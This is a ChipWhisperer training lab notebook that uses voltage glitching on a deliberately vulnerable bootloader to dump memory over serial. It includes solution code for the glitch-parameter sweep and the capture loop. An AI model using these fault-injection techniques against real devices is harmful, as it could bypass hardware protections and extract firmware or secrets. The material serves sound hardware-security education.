# Part 2, Topic 3: Voltage Glitching to Dump Memory (MAIN)

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *In the previous labs, we learned how voltage glitching can be used for a similar function as clock glitching. We also learned about how it has fewer limitations, but can be less reliable for certain target setups. It also changes a great deal based on the properties of the glitch circuit itself - even changing a wire can have a huge effect.*

*In this lab, we'll use what we learned in the last lab to again attack the vulnerable serial printing of the bootloader*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching
* Understanding how compiler optimizations can cause devices to behave in strange ways

## The Situation

You should already know the situation from your previous attempts at glitching this bootloader (as well as what the flaw is). No need to do big long searches for parameters to try glitching at the beginning of the loop, just use values that worked well for the previous tutorial.

Be careful that you don't accidentally put the spot we're trying to glitch outside of `glitch_spots` - if you used a repeat > 1, the actual spot being glitched might be at the end or in the middle of the repeat!

Like with the clock glitching version of this lab, we'll be using SimpleSerial V2 to speed up glitching

In [ ]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEARM'
SS_VER='SS_VER_2_1'

In [ ]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../hardware/victims/firmware/bootloader-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE -j SS_VER=$2

In [ ]:
%run "../../Setup_Scripts/Setup_Generic.ipynb"

In [ ]:
fw_path = "../../../hardware/victims/firmware/bootloader-glitch/bootloader-{}.hex".format(PLATFORM)

In [ ]:
cw.program_target(scope, prog, fw_path)

In [ ]:
def reboot_flush():            
    reset_target(scope)
    #Flush garbage too
    target.flush()
scope.clock.adc_src = "clkgen_x1"
reboot_flush()
scope.adc.samples = 24000

Again, we're going to use a higher frequency on non-Husky ChipWhisperers. We'll also use the trigger length to get our `ext_offset` range:

In [ ]:
scope.clock.adc_src = "clkgen_x1"
def reboot_flush():            
    reset_target(scope)
    #Flush garbage too
    target.flush()
    
scope.clock.adc_src = "clkgen_x1"
reboot_flush()
scope.adc.samples = 24000

if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
elif (PLATFORM == "CWLITEARM") or ("F3" in PLATFORM):
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37

reboot_flush()
scope.arm()
target.write("p516261276720736265747267206762206f686c207a76797821\n")
ret = scope.capture()
        
trig_count = scope.adc.trig_count

print(trig_count)
cw.plot(scope.get_last_trace())

Like with the clock version of this lab, you'll want to inspect the power trace and glitch near the beginning and end of the loop.

In [ ]:
glitch_spots = [i for i in range(1)]
# ###################
# Add your code here
# ###################
#raise NotImplementedError("Add your code here, and delete this.")

# ###################
# START SOLUTION
# ###################
glitch_spots = list(range(trig_count - 2000, trig_count, 1))
if SS_VER == "SS_VER_2_1":
    glitch_spots = list(range(0, trig_count, 1))
elif PLATFORM == "CW308_SAM4S":
    glitch_spots = list(range(trig_count - 2300, trig_count-1800, 1))
elif PLATFORM == "CWLITEXMEGA":
    glitch_spots = list(range(9500, 9650, 1))
# ###################
# END SOLUTION
# ###################

In [ ]:
if scope._is_husky:
    scope.vglitch_setup('hp', default_setup=False)
else:
    scope.vglitch_setup('both', default_setup=False) # use both transistors

def my_print(text):
    for ch in text:
        if (ord(ch) > 31 and ord(ch) < 127) or ch == "\n": 
            print(ch, end='')
        else:
            print("0x{:02X}".format(ord(ch)), end='')
        print("", end='')

In [ ]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset", "tries"])
gc.display_stats()

In [ ]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None}, x_index="width", y_index="ext_offset")

In [ ]:
if scope._is_husky:
    gc.set_range("width", 1850, 1901)
    gc.set_range("offset", 2000, 2300)
    gc.set_global_step([50])
else:
    gc.set_global_step(0.4)
    if PLATFORM == "CWLITEXMEGA":
        gc.set_range("width", 46, 49.8)
        gc.set_range("offset", -46, -49.8)
        scope.glitch.repeat = 11
    elif PLATFORM == "CW308_STM32F4":
        gc.set_range("width", 0.4, 10)
        gc.set_range("offset", 40, 49.8)
        scope.glitch.repeat = 5
    elif PLATFORM == "CWLITEARM":
        gc.set_range("width", 34, 36)
        gc.set_range("offset", -40, 10)
        scope.glitch.repeat = 7

gc.set_range("tries", 1, 1) # change this if you want to glitch each spot multiple times
gc.set_range("ext_offset", glitch_spots[0], glitch_spots[-1])
gc.set_step("ext_offset", glitch_spots[1] - glitch_spots[0])
gc.set_step("tries", 1)

In [ ]:
#disable logging
cw.set_all_log_levels(cw.logging.CRITICAL)
scope.adc.timeout = 0.2

broken = False
for glitch_setting in gc.glitch_values():
    scope.glitch.offset = glitch_setting[1]
    scope.glitch.width = glitch_setting[0]
    if broken:
        break
    scope.glitch.ext_offset = glitch_setting[2]
    if scope.adc.state:
        #print("Timeout, trigger still high!")
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    target.flush()
    scope.arm()
    target.write("p516261276720736265747267206762206f686c207a76797821\n")
    ret = scope.capture()
    if ret:
        #print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    else:
        time.sleep(0.05)
        output = target.read(timeout=2)
        if "767" in output:
            print("Glitched!\n\tExt offset: {}\n\tOffset: {}\n\tWidth: {}".format(scope.glitch.ext_offset, scope.glitch.offset, scope.glitch.width))
            gc.add("success")
            broken = True 
            for __ in range(500):
                num_char = target.in_waiting()
                if num_char:
                    my_print(output)
                    output = target.read(timeout=50)
            time.sleep(1)
            break
        else:
            gc.add("normal")
                
#reenable logging
cw.set_all_log_levels(cw.logging.WARNING)

In [ ]:
scope.dis()
target.dis()

In [ ]:
assert broken == True